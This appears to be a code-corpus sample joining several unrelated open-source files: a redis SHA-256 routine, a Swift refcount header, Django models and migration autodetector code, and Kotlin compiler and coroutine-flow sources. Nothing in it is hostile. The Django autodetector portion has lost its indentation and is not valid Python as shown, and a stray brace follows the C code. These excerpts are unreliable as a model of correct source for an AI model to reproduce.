		ctx->data[ctx->datalen] = data[i];
		ctx->datalen++;
		if (ctx->datalen == 64) {
			sha256_transform(ctx, ctx->data);
			ctx->bitlen += 512;   /* one full block = 512 bits hashed */
			ctx->datalen = 0;
		}
	}
}
/* Finish the hash: pad the residual buffer per FIPS 180 (0x80, zeros,
 * then the 64-bit total message length in bits, big-endian), run the
 * final transform(s), and write the 32-byte big-endian digest to
 * `hash`. The context must be re-initialized before reuse. */
void sha256_final(SHA256_CTX *ctx, BYTE hash[])
{
	WORD i;

	i = ctx->datalen;

	// Pad whatever data is left in the buffer.
	if (ctx->datalen < 56) {
		/* The 8-byte length field still fits in this block. */
		ctx->data[i++] = 0x80;
		while (i < 56)
			ctx->data[i++] = 0x00;
	}
	else {
		/* No room for the length: close this block, then pad a fresh one. */
		ctx->data[i++] = 0x80;
		while (i < 64)
			ctx->data[i++] = 0x00;
		sha256_transform(ctx, ctx->data);
		memset(ctx->data, 0, 56);
	}

	// Append to the padding the total message's length in bits and transform.
	ctx->bitlen += ctx->datalen * 8;
	ctx->data[63] = ctx->bitlen;
	ctx->data[62] = ctx->bitlen >> 8;
	ctx->data[61] = ctx->bitlen >> 16;
	ctx->data[60] = ctx->bitlen >> 24;
	ctx->data[59] = ctx->bitlen >> 32;
	ctx->data[58] = ctx->bitlen >> 40;
	ctx->data[57] = ctx->bitlen >> 48;
	ctx->data[56] = ctx->bitlen >> 56;
	sha256_transform(ctx, ctx->data);

	// Since this implementation uses little endian byte ordering and SHA uses big endian,
	// reverse all the bytes when copying the final state to the output hash.
	for (i = 0; i < 4; ++i) {
		hash[i]      = (ctx->state[0] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 4]  = (ctx->state[1] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 8]  = (ctx->state[2] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 12] = (ctx->state[3] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 16] = (ctx->state[4] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 20] = (ctx->state[5] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 24] = (ctx->state[6] >> (24 - i * 8)) & 0x000000ff;
		hash[i + 28] = (ctx->state[7] >> (24 - i * 8)) & 0x000000ff;
	}
}
} | c | github | https://github.com/redis/redis | src/sha256.c |
//===--- ThreadSafeRefCounted.h - Thread-safe Refcounting Base --*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_BASIC_THREADSAFEREFCOUNTED_H
#define SWIFT_BASIC_THREADSAFEREFCOUNTED_H
#include <atomic>
#include <cassert>
#include "llvm/ADT/IntrusiveRefCntPtr.h"
namespace swift {
/// A class that has the same function as \c ThreadSafeRefCountedBase, but with
/// a virtual destructor.
///
/// Should be used instead of \c ThreadSafeRefCountedBase for classes that
/// already have virtual methods to enforce dynamic allocation via 'new'.
/// FIXME: This should eventually move to llvm.
class ThreadSafeRefCountedBaseVPTR {
  /// Atomic reference count; mutable so const objects can be retained.
  mutable std::atomic<unsigned> ref_cnt;

  /// Out-of-line anchor to pin the vtable in one translation unit.
  virtual void anchor();

protected:
  ThreadSafeRefCountedBaseVPTR() : ref_cnt(0) {}
  virtual ~ThreadSafeRefCountedBaseVPTR() {}

public:
  /// Atomically take an additional reference.
  void Retain() const {
    ref_cnt.fetch_add(1);
  }

  /// Atomically drop one reference; destroys the object (via the
  /// virtual destructor) when the count reaches zero.
  void Release() const {
    const int remaining = static_cast<int>(ref_cnt.fetch_sub(1)) - 1;
    assert(remaining >= 0 && "Reference count was already zero.");
    if (remaining == 0)
      delete this;
  }
};
} // end namespace swift
#endif // SWIFT_BASIC_THREADSAFEREFCOUNTED_H | c | github | https://github.com/apple/swift | include/swift/Basic/ThreadSafeRefCounted.h |
from django.db import models
class Foo(models.Model):
    # Simple model used as the target of Bar's class-based and
    # string-based ("Foo") foreign keys.
    name = models.CharField(max_length=50)
    friend = models.CharField(max_length=50, blank=True)
class Bar(models.Model):
    # Exercises three FK declaration styles: a model class ("normal"),
    # a forward string reference ("Whiz" is defined below), and a
    # backward string reference ("Foo" is defined above).
    name = models.CharField(max_length=50)
    normal = models.ForeignKey(Foo, models.CASCADE, related_name="normal_foo")
    fwd = models.ForeignKey("Whiz", models.CASCADE)
    back = models.ForeignKey("Foo", models.CASCADE)
class Whiz(models.Model):
    # Target of Bar.fwd's forward string reference.
    name = models.CharField(max_length=50)
class Child(models.Model):
    # One-to-one via a forward string reference ("Base" is defined below).
    parent = models.OneToOneField("Base", models.CASCADE)
    name = models.CharField(max_length=50)
class Base(models.Model):
    # Target of Child.parent's one-to-one string reference.
    name = models.CharField(max_length=50)
class Article(models.Model):
    # Includes a nullable GenericIPAddressField alongside text fields.
    name = models.CharField(max_length=50)
    text = models.TextField()
    submitted_from = models.GenericIPAddressField(blank=True, null=True)
/*
* Copyright 2010-2022 JetBrains s.r.o. and Kotlin Programming Language contributors.
* Use of this source code is governed by the Apache 2.0 license that can be found in the license/LICENSE.txt file.
*/
package org.jetbrains.kotlin.analysis.api.fir.diagnostics
import com.intellij.psi.PsiElement
import org.jetbrains.kotlin.analysis.api.lifetime.KaLifetimeToken
import org.jetbrains.kotlin.diagnostics.*
/** [KaCompilerPluginDiagnostic0] backed by a FIR diagnostic carrying no parameters. */
internal class KaCompilerPluginDiagnostic0Impl(
    firDiagnostic: KtPsiSimpleDiagnostic,
    token: KaLifetimeToken
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic0
/** [KaCompilerPluginDiagnostic1] backed by a FIR diagnostic carrying one parameter. */
internal class KaCompilerPluginDiagnostic1Impl(
    firDiagnostic: KtPsiDiagnosticWithParameters1<*>,
    token: KaLifetimeToken,
    override val parameter1: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic1
/** [KaCompilerPluginDiagnostic2] backed by a FIR diagnostic carrying two parameters. */
internal class KaCompilerPluginDiagnostic2Impl(
    firDiagnostic: KtPsiDiagnosticWithParameters2<*, *>,
    token: KaLifetimeToken,
    override val parameter1: Any?,
    override val parameter2: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic2
/** [KaCompilerPluginDiagnostic3] backed by a FIR diagnostic carrying three parameters. */
internal class KaCompilerPluginDiagnostic3Impl(
    firDiagnostic: KtPsiDiagnosticWithParameters3<*, *, *>,
    token: KaLifetimeToken,
    override val parameter1: Any?,
    override val parameter2: Any?,
    override val parameter3: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic3
/** [KaCompilerPluginDiagnostic4] backed by a FIR diagnostic carrying four parameters. */
internal class KaCompilerPluginDiagnostic4Impl(
    firDiagnostic: KtPsiDiagnosticWithParameters4<*, *, *, *>,
    token: KaLifetimeToken,
    override val parameter1: Any?,
    override val parameter2: Any?,
    override val parameter3: Any?,
    override val parameter4: Any?
) : KaAbstractFirDiagnostic<PsiElement>(firDiagnostic, token), KaCompilerPluginDiagnostic4
@file:JvmMultifileClass
@file:JvmName("FlowKt")
@file:Suppress("UNCHECKED_CAST")
package kotlinx.coroutines.flow
import kotlinx.coroutines.*
import kotlinx.coroutines.flow.internal.*
import kotlin.jvm.*
// ------------------ WARNING ------------------
// These emitting operators must use safe flow builder, because they allow
// user code to directly emit to the underlying FlowCollector.
/**
* Applies [transform] function to each value of the given flow.
*
* The receiver of the `transform` is [FlowCollector] and thus `transform` is a
* flexible function that may transform emitted element, skip it or emit it multiple times.
*
* This operator generalizes [filter] and [map] operators and
* can be used as a building block for other operators, for example:
*
* ```
* fun Flow<Int>.skipOddAndDuplicateEven(): Flow<Int> = transform { value ->
* if (value % 2 == 0) { // Emit only even values, but twice
* emit(value)
* emit(value)
* } // Do nothing if odd
* }
* ```
*/
public inline fun <T, R> Flow<T>.transform(
    @BuilderInference crossinline transform: suspend FlowCollector<R>.(value: T) -> Unit
): Flow<R> = flow { // Note: safe flow is used here, because collector is exposed to transform on each operation
    collect { value ->
        // kludge, without it Unit will be returned and TCE (tail-call elimination) won't kick in, KT-28938
        return@collect transform(value)
    }
}
// For internal operator implementation: like [transform], but skips the
// SafeCollector wrapping since internal operators uphold context
// preservation themselves.
@PublishedApi
internal inline fun <T, R> Flow<T>.unsafeTransform(
    @BuilderInference crossinline transform: suspend FlowCollector<R>.(value: T) -> Unit
): Flow<R> = unsafeFlow { // Note: unsafe flow is used here, because unsafeTransform is only for internal use
    collect { value ->
        // kludge, without it Unit will be returned and TCE won't kick in, KT-28938
        return@collect transform(value)
    }
}
/**
* Returns a flow that invokes the given [action] **before** this flow starts to be collected.
*
* The [action] is called before the upstream flow is started, so if it is used with a [SharedFlow]
* there is **no guarantee** that emissions from the upstream flow that happen inside or immediately
* after this `onStart` action will be collected
* (see [onSubscription] for an alternative operator on shared flows).
*
* The receiver of the [action] is [FlowCollector], so `onStart` can emit additional elements.
* For example:
*
* ```
* flowOf("a", "b", "c")
* .onStart { emit("Begin") }
* .collect { println(it) } // prints Begin, a, b, c
* ```
*/
public fun <T> Flow<T>.onStart(
    action: suspend FlowCollector<T>.() -> Unit
): Flow<T> = unsafeFlow { // Note: unsafe flow is used here, but safe collector is used to invoke start action
    // Run the start action through a SafeCollector so its emissions are
    // context-checked, then release the collector's intercepted continuation.
    val safeCollector = SafeCollector<T>(this, currentCoroutineContext())
    try {
        safeCollector.action()
    } finally {
        safeCollector.releaseIntercepted()
    }
    collect(this) // directly delegate
}
/**
* Returns a flow that invokes the given [action] **after** the flow is completed or cancelled, passing
* the cancellation exception or failure as cause parameter of [action].
*
* Conceptually, `onCompletion` is similar to wrapping the flow collection into a `finally` block,
* for example the following imperative snippet:
*
* ```
* try {
* myFlow.collect { value ->
* println(value)
* }
* } finally {
* println("Done")
* }
* ```
*
* can be replaced with a declarative one using `onCompletion`:
*
* ```
* myFlow
* .onEach { println(it) }
* .onCompletion { println("Done") }
* .collect()
* ```
*
* Unlike [catch], this operator reports exception that occur both upstream and downstream
* and observe exceptions that are thrown to cancel the flow. Exception is empty if and only if
* the flow had fully completed successfully. Conceptually, the following code:
*
* ```
* myFlow.collect { value ->
* println(value)
* }
* println("Completed successfully")
* ```
*
* can be replaced with:
*
* ```
* myFlow
* .onEach { println(it) }
* .onCompletion { if (it == null) println("Completed successfully") }
* .collect()
* ```
*
* The receiver of the [action] is [FlowCollector] and this operator can be used to emit additional
* elements at the end **if it completed successfully**. For example:
*
* ```
* flowOf("a", "b", "c")
* .onCompletion { emit("Done") }
* .collect { println(it) } // prints a, b, c, Done
* ```
*
* In case of failure or cancellation, any attempt to emit additional elements throws the corresponding exception.
* Use [catch] if you need to suppress failure and replace it with emission of elements.
*/
public fun <T> Flow<T>.onCompletion(
    action: suspend FlowCollector<T>.(cause: Throwable?) -> Unit
): Flow<T> = unsafeFlow { // Note: unsafe flow is used here, but safe collector is used to invoke completion action
    try {
        collect(this) // delegate collection of the upstream directly
    } catch (e: Throwable) {
        /*
         * Use throwing collector to prevent any emissions from the
         * completion sequence when downstream has failed, otherwise it may
         * lead to a non-sequential behaviour impossible with `finally`
         */
        ThrowingCollector(e).invokeSafely(action, e)
        throw e
    }
    // Normal completion: run the action with a null cause through a
    // SafeCollector so it may emit trailing elements.
    val sc = SafeCollector(this, currentCoroutineContext())
    try {
        sc.action(null)
    } finally {
        sc.releaseIntercepted()
    }
}
/**
* Invokes the given [action] when this flow completes without emitting any elements.
* The receiver of the [action] is [FlowCollector], so `onEmpty` can emit additional elements.
* For example:
*
* ```
* emptyFlow<Int>().onEmpty {
* emit(1)
* emit(2)
* }.collect { println(it) } // prints 1, 2
* ```
*/
public fun <T> Flow<T>.onEmpty(
    action: suspend FlowCollector<T>.() -> Unit
): Flow<T> = unsafeFlow {
    // Track whether the upstream produced anything while re-emitting it.
    var isEmpty = true
    collect {
        isEmpty = false
        emit(it)
    }
    if (isEmpty) {
        // Upstream finished without a single element: run the action
        // through a SafeCollector so it may emit replacement elements.
        val collector = SafeCollector(this, currentCoroutineContext())
        try {
            collector.action()
        } finally {
            collector.releaseIntercepted()
        }
    }
}
/*
* 'emitAll' methods call this to fail-fast before starting to collect
* their sources (that may not have any elements for a long time).
*/
internal fun FlowCollector<*>.ensureActive() {
    // Rethrow the downstream failure early if this collector is the
    // throwing placeholder installed by onCompletion's failure path.
    if (this is ThrowingCollector) throw e
}
/** A collector that rethrows [e] on every emission attempt; used to
 * forbid emissions after a downstream failure. */
internal class ThrowingCollector(@JvmField val e: Throwable) : FlowCollector<Any?> {
    override suspend fun emit(value: Any?) {
        throw e
    }
}
private suspend fun <T> FlowCollector<T>.invokeSafely(
    action: suspend FlowCollector<T>.(cause: Throwable?) -> Unit,
    cause: Throwable?
) {
    try {
        action(cause)
    } catch (e: Throwable) {
        // Keep the original failure visible as a suppressed exception,
        // unless the action rethrew that very same instance.
        if (cause !== null && cause !== e) e.addSuppressed(cause)
        throw e
    }
}
from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.db.migrations.utils import COMPILED_REGEX_TYPE, RegexObject
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
    """Capture the two project states to diff. `questioner` resolves
    ambiguities (e.g. renames); defaults to the non-interactive
    MigrationQuestioner."""
    self.from_state = from_state
    self.to_state = to_state
    self.questioner = questioner or MigrationQuestioner()
    # App labels present in the old project state.
    self.existing_apps = {app for app, model in from_state.models}
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
    """
    Main entry point to produce a list of appliable changes.
    Takes a graph to base names on and an optional set of apps
    to try and restrict to (restriction is not guaranteed)

    Returns a dict mapping app labels to lists of Migration objects.
    """
    changes = self._detect_changes(convert_apps, graph)
    # Name the migrations and wire dependencies against the graph.
    changes = self.arrange_for_graph(changes, graph, migration_name)
    if trim_to_apps:
        changes = self._trim_to_apps(changes, trim_to_apps)
    return changes
def deep_deconstruct(self, obj):
    """
    Recursive deconstruction for a field and its arguments.
    Used for full comparison for rename/alter; sometimes a single-level
    deconstruction will not compare correctly.
    """
    if isinstance(obj, list):
        return [self.deep_deconstruct(value) for value in obj]
    elif isinstance(obj, tuple):
        return tuple(self.deep_deconstruct(value) for value in obj)
    elif isinstance(obj, dict):
        return {
            key: self.deep_deconstruct(value)
            for key, value in obj.items()
        }
    elif isinstance(obj, COMPILED_REGEX_TYPE):
        # Compiled regexes don't compare equal; wrap in a comparable proxy.
        return RegexObject(obj)
    elif isinstance(obj, type):
        # If this is a type that implements 'deconstruct' as an instance method,
        # avoid treating this as being deconstructible itself - see #22951
        return obj
    elif hasattr(obj, 'deconstruct'):
        deconstructed = obj.deconstruct()
        if isinstance(obj, models.Field):
            # we have a field which also returns a name
            deconstructed = deconstructed[1:]
        path, args, kwargs = deconstructed
        # Recurse into the deconstructed args/kwargs as well.
        return (
            path,
            [self.deep_deconstruct(value) for value in args],
            {
                key: self.deep_deconstruct(value)
                for key, value in kwargs.items()
            },
        )
    else:
        # Plain value: returned as-is for direct comparison.
        return obj
def only_relation_agnostic_fields(self, fields):
    """
    Return a definition of the fields that ignores field names and
    what related fields actually relate to.
    Used for detecting renames (as, of course, the related fields
    change during renames)
    """
    fields_def = []
    for name, field in sorted(fields):
        deconstruction = self.deep_deconstruct(field)
        if field.remote_field and field.remote_field.model:
            # Strip the relation target so renamed targets still match.
            # NOTE(review): assumes 'to' was passed as a keyword argument;
            # a positional relation target would raise KeyError here -- confirm.
            del deconstruction[2]['to']
        fields_def.append(deconstruction)
    return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
    """
    Returns a dict of migration plans which will achieve the
    change from from_state to to_state. The dict has app labels
    as keys and a list of migrations as values.

    The resulting migrations aren't specially named, but the names
    do matter for dependencies inside the set.

    convert_apps is the list of apps to convert to use migrations
    (i.e. to make initial migrations for, in the usual case)

    graph is an optional argument that, if provided, can help improve
    dependency generation and avoid potential circular dependencies.
    """
    # The first phase is generating all the operations for each app
    # and gathering them into a big per-app list.
    # We'll then go through that list later and order it and split
    # into migrations to resolve dependencies caused by M2Ms and FKs.
    self.generated_operations = {}

    # Prepare some old/new state and model lists, separating
    # proxy models and ignoring unmigrated apps.
    self.old_apps = self.from_state.concrete_apps
    self.new_apps = self.to_state.apps
    self.old_model_keys = []
    self.old_proxy_keys = []
    self.old_unmanaged_keys = []
    self.new_model_keys = []
    self.new_proxy_keys = []
    self.new_unmanaged_keys = []
    # Bucket every old-state model as unmanaged / proxy / concrete.
    for al, mn in sorted(self.from_state.models.keys()):
        model = self.old_apps.get_model(al, mn)
        if not model._meta.managed:
            self.old_unmanaged_keys.append((al, mn))
        elif al not in self.from_state.real_apps:
            if model._meta.proxy:
                self.old_proxy_keys.append((al, mn))
            else:
                self.old_model_keys.append((al, mn))
    # Same bucketing for the new state; apps being converted to use
    # migrations (convert_apps) are included even if "real".
    for al, mn in sorted(self.to_state.models.keys()):
        model = self.new_apps.get_model(al, mn)
        if not model._meta.managed:
            self.new_unmanaged_keys.append((al, mn))
        elif (
            al not in self.from_state.real_apps or
            (convert_apps and al in convert_apps)
        ):
            if model._meta.proxy:
                self.new_proxy_keys.append((al, mn))
            else:
                self.new_model_keys.append((al, mn))

    # Renames have to come first
    self.generate_renamed_models()

    # Prepare lists of fields and generate through model map
    self._prepare_field_lists()
    self._generate_through_model_map()

    # Generate non-rename model operations
    self.generate_deleted_models()
    self.generate_created_models()
    self.generate_deleted_proxies()
    self.generate_created_proxies()
    self.generate_altered_options()
    self.generate_altered_managers()

    # Generate field operations
    self.generate_renamed_fields()
    self.generate_removed_fields()
    self.generate_added_fields()
    self.generate_altered_fields()
    self.generate_altered_unique_together()
    self.generate_altered_index_together()
    self.generate_altered_db_table()
    self.generate_altered_order_with_respect_to()

    # Order the operations, split them into migrations with
    # inter-migration dependencies, then optimize each migration.
    self._sort_migrations()
    self._build_migration_list(graph)
    self._optimize_migrations()

    return self.migrations
def _prepare_field_lists(self):
    """
    Prepare field lists, and prepare a list of the fields that used
    through models in the old state so we can make dependencies
    from the through model deletion to the field that uses it.
    """
    # Models/proxies/unmanaged models that exist on both sides.
    self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
    self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
    self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
    self.through_users = {}
    # (app_label, model_name, field_name) triples per state side.
    self.old_field_keys = set()
    self.new_field_keys = set()
    for app_label, model_name in sorted(self.kept_model_keys):
        # Look fields up under the model's old name if it was renamed.
        old_model_name = self.renamed_models.get((app_label, model_name), model_name)
        old_model_state = self.from_state.models[app_label, old_model_name]
        new_model_state = self.to_state.models[app_label, model_name]
        self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
        self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
def _generate_through_model_map(self):
    """
    Through model map generation
    """
    # Map each explicit (non auto-created) M2M through model, keyed by
    # (app_label, model_name), to the field that uses it.
    for app_label, model_name in sorted(self.old_model_keys):
        old_model_name = self.renamed_models.get((app_label, model_name), model_name)
        old_model_state = self.from_state.models[app_label, old_model_name]
        for field_name, field in old_model_state.fields:
            old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
            if (hasattr(old_field, "remote_field") and getattr(old_field.remote_field, "through", None)
                    and not old_field.remote_field.through._meta.auto_created):
                through_key = (
                    old_field.remote_field.through._meta.app_label,
                    old_field.remote_field.through._meta.model_name,
                )
                self.through_users[through_key] = (app_label, old_model_name, field_name)
    def _build_migration_list(self, graph=None):
        """
        We need to chop the lists of operations up into migrations with
        dependencies on each other. We do this by stepping up an app's list of
        operations until we find one that has an outgoing dependency that isn't
        in another app's migration yet (hasn't been chopped off its list). We
        then chop off the operations before it into a migration and move onto
        the next app. If we loop back around without doing anything, there's a
        circular dependency (which _should_ be impossible as the operations are
        all split at this point so they can't depend and be depended on).

        ``graph`` (a MigrationGraph, optional) is used only in chop mode to
        point external-app dependencies at that app's current leaf migration.
        Populates ``self.migrations`` from ``self.generated_operations``.
        """
        self.migrations = {}
        num_ops = sum(len(x) for x in self.generated_operations.values())
        # chop_mode is enabled only after a full pass makes no progress;
        # it relaxes dependency resolution so remaining ops can be chopped.
        chop_mode = False
        while num_ops:
            # On every iteration, we step through all the apps and see if there
            # is a completed set of operations.
            # If we find that a subset of the operations are complete we can
            # try to chop it off from the rest and continue, but we only
            # do this if we've already been through the list once before
            # without any chopping and nothing has changed.
            for app_label in sorted(self.generated_operations.keys()):
                chopped = []
                dependencies = set()
                for operation in list(self.generated_operations[app_label]):
                    deps_satisfied = True
                    operation_dependencies = set()
                    for dep in operation._auto_deps:
                        is_swappable_dep = False
                        if dep[0] == "__setting__":
                            # We need to temporarily resolve the swappable dependency to prevent
                            # circular references. While keeping the dependency checks on the
                            # resolved model we still add the swappable dependencies.
                            # See #23322
                            resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
                            original_dep = dep
                            dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
                            is_swappable_dep = True
                        if dep[0] != app_label and dep[0] != "__setting__":
                            # External app dependency. See if it's not yet
                            # satisfied.
                            for other_operation in self.generated_operations.get(dep[0], []):
                                if self.check_dependency(other_operation, dep):
                                    deps_satisfied = False
                                    break
                            if not deps_satisfied:
                                break
                            else:
                                if is_swappable_dep:
                                    operation_dependencies.add((original_dep[0], original_dep[1]))
                                elif dep[0] in self.migrations:
                                    operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
                                else:
                                    # If we can't find the other app, we add a first/last dependency,
                                    # but only if we've already been through once and checked everything
                                    if chop_mode:
                                        # If the app already exists, we add a dependency on the last migration,
                                        # as we don't know which migration contains the target field.
                                        # If it's not yet migrated or has no migrations, we use __first__
                                        if graph and graph.leaf_nodes(dep[0]):
                                            operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
                                        else:
                                            operation_dependencies.add((dep[0], "__first__"))
                                    else:
                                        deps_satisfied = False
                    if deps_satisfied:
                        chopped.append(operation)
                        dependencies.update(operation_dependencies)
                        self.generated_operations[app_label] = self.generated_operations[app_label][1:]
                    else:
                        break
                # Make a migration! Well, only if there's stuff to put in it
                if dependencies or chopped:
                    if not self.generated_operations[app_label] or chop_mode:
                        subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
                        instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
                        instance.dependencies = list(dependencies)
                        instance.operations = chopped
                        instance.initial = app_label not in self.existing_apps
                        self.migrations.setdefault(app_label, []).append(instance)
                        chop_mode = False
                    else:
                        # Couldn't finish the app; put the chopped ops back.
                        self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
            new_num_ops = sum(len(x) for x in self.generated_operations.values())
            if new_num_ops == num_ops:
                if not chop_mode:
                    chop_mode = True
                else:
                    # A no-progress pass even in chop mode means a genuine cycle.
                    raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
            num_ops = new_num_ops
def _sort_migrations(self):
"""
Reorder to make things possible. The order we have already isn't bad,
but we need to pull a few things around so FKs work nicely inside the
same app
"""
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
def _optimize_migrations(self):
# Add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
    def generate_renamed_models(self):
        """
        Finds any renamed models, and generates the operations for them,
        and removes the old entry from the model lists.
        Must be run before other model-level generation.

        A rename candidate is an added model whose relation-agnostic field
        definition matches a removed model in the same app; the questioner
        confirms each candidate. Populates ``self.renamed_models`` (keyed by
        new key, valued by old name) and ``self.renamed_models_rel`` (old
        "app.Model" -> new "app.Model" strings for relation rewriting).
        """
        self.renamed_models = {}
        self.renamed_models_rel = {}
        added_models = set(self.new_model_keys) - set(self.old_model_keys)
        for app_label, model_name in sorted(added_models):
            model_state = self.to_state.models[app_label, model_name]
            model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
            # Recomputed each iteration: old_model_keys mutates below.
            removed_models = set(self.old_model_keys) - set(self.new_model_keys)
            for rem_app_label, rem_model_name in removed_models:
                if rem_app_label == app_label:
                    rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
                    rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
                    if model_fields_def == rem_model_fields_def:
                        if self.questioner.ask_rename_model(rem_model_state, model_state):
                            self.add_operation(
                                app_label,
                                operations.RenameModel(
                                    old_name=rem_model_state.name,
                                    new_name=model_state.name,
                                )
                            )
                            self.renamed_models[app_label, model_name] = rem_model_name
                            self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
                            # Treat the old key as kept under its new name so
                            # later phases don't see a delete + create pair.
                            self.old_model_keys.remove((rem_app_label, rem_model_name))
                            self.old_model_keys.append((app_label, model_name))
                            break
    def generate_created_models(self):
        """
        Find all new models (both managed and unmanaged) and make create
        operations for them as well as separate operations to create any
        foreign key or M2M relationships (we'll optimize these back in later
        if we can).
        We also defer any model options that refer to collections of fields
        that might be deferred (e.g. unique_together, index_together).
        """
        old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
        added_models = set(self.new_model_keys) - old_keys
        added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
        # Swappable-looking models are sorted first (see swappable_first_key).
        all_added_models = chain(
            sorted(added_models, key=self.swappable_first_key, reverse=True),
            sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
        )
        for app_label, model_name in all_added_models:
            model_state = self.to_state.models[app_label, model_name]
            model_opts = self.new_apps.get_model(app_label, model_name)._meta
            # Gather related fields
            related_fields = {}
            primary_key_rel = None
            for field in model_opts.local_fields:
                if field.remote_field:
                    if field.remote_field.model:
                        if field.primary_key:
                            primary_key_rel = field.remote_field.model
                        elif not field.remote_field.parent_link:
